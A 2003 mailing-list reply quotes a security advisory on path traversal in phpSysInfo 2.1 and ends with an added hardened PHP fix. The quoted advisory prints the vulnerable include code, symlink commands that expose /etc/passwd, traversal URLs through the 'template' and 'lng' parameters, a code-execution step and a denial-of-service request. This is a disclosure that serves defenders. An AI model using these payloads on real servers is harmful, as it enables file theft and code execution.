Re: Unauthorized reading files on phpSysInfo

From: Wolter Kamphuis (security_at_wkamphuis.student.utwente.nl)
Date: 04/25/03

    Date: Fri, 25 Apr 2003 20:31:43 +0200
    To: ripe@7a69ezine.org


    Hi,

    In bug report #670222 I described the same problem and how to use it to
    DoS the host. Calling "index.php?lng=../../index" creates a runaway
    recursive loop, creating a huge load and finally crashing the
    Apache process. This can easily be used to DoS a webserver.
    http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

    On 19 January my fix for this problem was incorporated in the cvs
    repository. This also fixes the problems described in Albert Puigsech
    Galicia's report.
    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

    phpSysInfo 2.1 is vulnerable; the cvs versions after 19 January are not.

    mzzl
       Wolter Kamphuis

    Albert Puigsech Galicia wrote:
    > /-----------------------------------------------------------------------------\
    > | 7 A 6 9 - A d v C: 007
    > |-----------------------------------------------------------------------------|
    > |
    > | [ Unauthorized reading files on phpSysInfo ]
    > |
    > \-----------------------------------------------------------------------------/
    > | 01/04/2003 |
    >
    >
    > Data.
    > -----
    >
    > + Type: To gain visibility.
    >
    > + Software: phpSysInfo.
    >
    > + Versions: until 2.1 (current version).
    >
    > + Exploit: Yes (but only local).
    >
    > + Author: Albert Puigsech Galicia
    >
    > + Contact: ripe@7a69ezine.org
    >
    >
    >
    > Information.
    > ------------
    >
    > PhpSysInfo is a little PHP script intended to show system information.
    > It shows data like CPU or memory usage, disk usage, PCI, ethernet, and IDE
    > information, etc. Visit the project website at http://phpsysinfo.sourceforge.net
    > for more info.
    >
    >
    > Description.
    > ------------
    >
    > PhpSysInfo uses a template system based on the 'template' variable, and a
    > language system based on the 'lng' variable. These variables are used to complete
    > a file path without checking whether it contains the special '..' directory, allowing
    > any file on the system to be read as the webserver user.
    >
    >
    > Exploiting.
    > -----------
    >
    > Exploiting this vulnerability requires write access to a local
    > directory from which the webserver can read files.
    >
    > In the template case, phpSysInfo only checks whether the template exists. To do
    > so it only checks whether 'templates/$template' exists.
    >
    >
    > ---/ index.php /---
    >
    > if (!((isset($template) && file_exists("templates/$template")) || $template == 'xml')) {
    >     // default template we should use if we don't get a argument.
    >     $template = 'classic';
    > }
    >
    > ---/ index.php /---
    >
    >
    > Exactly the same in the language selection system.
    >
    >
    > ---/ index.php /---
    >
    > if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    >     $lng = 'en';
    >     // see if the browser knows the right language.
    >     if(isset($HTTP_ACCEPT_LANGUAGE)) {
    >         $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
    >         if(count($plng) > 0) {
    >             while(list($k,$v) = each($plng)) {
    >                 $k = split(';', $v, 1);
    >                 $k = split('-', $k[0]);
    >                 if(file_exists('./includes/lang/' . $k[0] . '.php')) {
    >                     $lng = $k[0];
    >                     break;
    >                 }
    >             }
    >         }
    >     }
    > }
    >
    > ---/ index.php /---
    >
    > The 'template' variable will be used to open the files
    > './templates/$template/form.tpl' and './templates/$template/box.tpl'
    > for template stuff, so it is necessary to create symlinks to read
    > any file the webserver is allowed to read.
    >
    >
    > local ~$ ln -s /etc/passwd /tmp/form.tpl
    > local ~$ ln -s /etc/passwd /tmp/box.tpl
    >
    > http://vulnerable/index.php?template=../../../../tmp
    >
    >
    > The 'lng' variable is used in this piece of code:
    >
    > ---/ index.php /---
    >
    > require('./includes/lang/' . $lng . '.php'); // get our language include
    >
    > ---/ index.php /---
    >
    >
    > It allows us, in the same way as 'template', to read a file on
    > the system.
    >
    >
    > local ~$ ln -s /etc/passwd /tmp/p.php
    >
    > http://vulnerable/index.php?lng=../../../../tmp/p
    >
    >
    > But it also allows arbitrary PHP code to be executed, by creating the php
    > file first.
    >
    >
    > local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
    >
    > http://vulnerable/index.php?lng=../../../../tmp/p
    >
    >
    > The use of the '.' PHP operator to concatenate strings prevents a remote exploit for
    > this vulnerable php script, because we can't use %00 to end the string.
    >
    >
    > Patch.
    > ------
    >
    > There is no official patch, but it is easy to code one by adding some
    > regex to the code to filter '..' content in the 'template' and 'lng' variables.
    >
    >
    >
    > --
    >
    >>====================================
    >>Albert Puigsech Galicia (7a69)
    >>
    >>http://ripe.7a69ezine.org
    >>====================================
    >
    >
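A hardened form of the two checks, as an added example that is neither phpSysInfo's code nor the fix in the cvs diff linked above; the directory layout is the one the advisory shows, and the function names and the use of $_GET instead of register_globals are assumptions:

```php
<?php
// Added example, not phpSysInfo's own code or the author's patch: a hardened
// version of the template and language selection. Directory names follow the
// advisory; the function names are assumed.

define('TEMPLATE_DIR', __DIR__ . '/templates');
define('LANG_DIR', __DIR__ . '/includes/lang');

// Accept only a plain identifier. This excludes '..', '/', '\' and NUL, so the
// value cannot leave the directory it is later appended to, and cannot name
// '../../index' to make index.php require itself (the DoS in bug #670222).
function pick_identifier($value, $default)
{
    if (is_string($value) && preg_match('/^[A-Za-z0-9_-]{1,32}$/', $value) === 1) {
        return $value;
    }
    return $default;
}

// Second line of defence: resolve the final path (following symlinks) and
// confirm it still lies inside $base_dir. A symlinked form.tpl or p.php that
// points at /etc/passwd resolves outside the directory and is rejected.
function resolve_inside($base_dir, $relative)
{
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $relative);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$template = pick_identifier(isset($_GET['template']) ? $_GET['template'] : null, 'classic');
$lng      = pick_identifier(isset($_GET['lng']) ? $_GET['lng'] : null, 'en');

$form_tpl  = resolve_inside(TEMPLATE_DIR, $template . '/form.tpl');
$box_tpl   = resolve_inside(TEMPLATE_DIR, $template . '/box.tpl');
$lang_file = resolve_inside(LANG_DIR, $lng . '.php');

if ($form_tpl === null || $box_tpl === null) {
    // Unknown or tampered template: fall back to the shipped default.
    $form_tpl = TEMPLATE_DIR . '/classic/form.tpl';
    $box_tpl  = TEMPLATE_DIR . '/classic/box.tpl';
}
if ($lang_file === null) {
    $lang_file = LANG_DIR . '/en.php';
}

require $lang_file; // now always a regular file below includes/lang/
```

With both layers in place, "template=../../../../tmp" and "lng=../../../../tmp/p" fail the identifier check, and a symlink planted inside the real directories still fails the realpath containment check.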

